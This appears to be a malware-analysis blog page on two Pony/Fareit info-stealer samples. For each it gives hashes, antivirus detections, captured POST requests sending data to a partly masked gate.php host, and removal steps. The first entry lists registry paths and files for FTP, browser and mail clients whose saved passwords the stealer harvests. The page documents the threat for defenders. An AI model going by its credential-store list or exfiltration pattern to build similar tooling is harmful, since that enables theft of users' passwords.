Skip to content

Malware analysis

looking for the perfect virus

Archive

Tag: pony

Pony.exe

Apr 12

File: Pony.exe
CRC-32: 7bbafba6
MD4: 1665b859e0c0c22dc4691aa61b3f69d4
MD5: 3c26a27f3937e274542a40ba04a76493
SHA-1: 256d1c7c4b8127bde01eb66bdc1439b89fa137e3
Size: 35.5 KB (36,352 bytes)

antivirus detection:
Started at: 18:47 12.04.2013 Finished at: 18:48 12.04.2013, chk4me.com
arcavir WIR: Heur.RoundKick
avast Win32:Agent-AOOD [Trj]
avg Trojan horse PSW.Generic10.BAHN
avira Is the TR/PSW.Fareit.488 Trojan
bitdefender Gen:Variant.Graftor.31587
clamav PUA.Win32.Packer.Upx-53 FOUND
comodo Malware@#3fxw8ofzoj9ty
drweb infected with Trojan.PWS.Stealer.1997
emsisoft Gen:Variant.Graftor.31587 (B)
nod32 a variant of Win32/PSW.Fareit.A trojan
fprot Ok
fsecure Gen:Variant.Graftor.31587
ikarus Trojan-PWS.Win32.Fareit
kaspersky HEUR:Trojan.Win32.Generic
mcafee Found the Generic PWS.y!1wx trojan !!!
microsoft PWS:Win32/Fareit
norman win32:winpe/Fareit.T
panda Trj/Genetic.gen
quickheal Detected: “TrojanPWS.Fareit”
sophos Ok
symantec Downloader.Ponik
etrust Ok
trendmicro Ok
virusbuster trojan found: Trojan.PWS.Fareit!kSA0qeeHvYc

process:
Pony.exe

network activity:
POST /enter.exe/gate.php HTTP/1.0
Host: track***invites.net
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 6168
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

memory strings:

UPX0
`UPX1
`.rsrc
UPX!
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\FileZilla
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\TurboFTP 
Software\Sota\FFFTP 
Software\Sota\FFFTP\Options
Software\CoffeeCup Software\Internet\Profiles
Software\FTPWare\COREFTP\Sites
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224 
Software\FTP Explorer\Profiles
Software\VanDyke\SecureFX
Software\NCH Software\ClassicFTP\FTPAccounts
SOFTWARE\NCH Software\Fling\Accounts
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
\LeapWare\LeapFTP
Software\South River Technologies\WebDrive\Connections
Software\Opera Software
wiseftpsrvs.ini
wiseftp.ini
FTPVoyager.ftp
\Mozilla\Firefox\
Software\Mozilla
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
\Google\Chrome
\Chromium
\ChromePlus
Software\ChromePlus
SOFTWARE\Robo-FTP 3.7\Scripts
SOFTWARE\Robo-FTP 3.7\FTPServers
Software\LinasFTP\Site Manager
Software\SimonTatham\PuTTY\Sessions
Software\CoffeeCup Software
Software\MAS-Soft\FTPInfo\Setup
\Microsoft\Windows Live Mail
Software\IncrediMail
Software\RIT\The Bat!\Users depot
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Internet Account Manager
inetcomm server passwords
outlook account manager passwords

malware type:pony, info-stealer

removal:
kill process: pony.exe
change all password

Incoming search terms:

File: Metin 2 Bob Hack v2.0.exe
CRC-32: b2ba18f8
MD4: d08f63f1993f321dc120253fbdb816a5
MD5: 0cb8796532de41f04e2c4c6c1f36c218
SHA-1: ed646ea700ffa4e404381a752f2166c273c2b042
Size: 474 KB (485,376 bytes)

Comments “Marion”
CompanyName “Marion”
FileDescription “Marion”
FileVersion “8.2.4.7″
InternalName “Marion.exe”
LegalCopyright “Copyright © Marion 2013″
OriginalFilename “Marion.exe”
ProductName “Marion”
ProductVersion “8.2.4.7″
Assembly Version “8.2.4.7″

antivirus detection:
Started at: 22:02 16.01.2013 Finished at: 22:03 16.01.2013, chk4me.com
arcavir Ok
avast Win32:Malware-gen
avg Trojan horse BackDoor.Generic16.AEEU
avira Is the TR/PSW.Fareit.219 Trojan
bitdefender Backdoor.Generic.759869
clamav Ok
comodo TrojWare.MSIL.Injector.AVW@290738089
drweb infected with BackDoor.Tordev.8
emsisoft Backdoor.Generic.759869 (B)
nod32 a variant of MSIL/Injector.AWU trojan
fprot Ok
fsecure Backdoor.Generic.759869
ikarus Backdoor.Win32.Fynloski
kaspersky Trojan.Win32.Genome.ajpvn
mcafee Ok
microsoft PWS:Win32/Fareit
norman winpe/Troj_Generic.GMVNZ
panda Ok
quickheal Ok
sophos Ok
symantec Ok
etrust Ok
trendmicro Ok
vipre Trojan.Win32.Generic!BT
vba32 Ok
virusbuster trojan found: Trojan.Genome!WcZb6MGy83o

process:
vbc.exe (C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe)

network activity:

POST /gate.php HTTP/1.0
Host: pon***.comlu.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 5914
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

delete file:
c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe

removal:
1. kill vbc.exe
2. delete Metin 2 Bob Hack v2.0.exe
3. change all passwords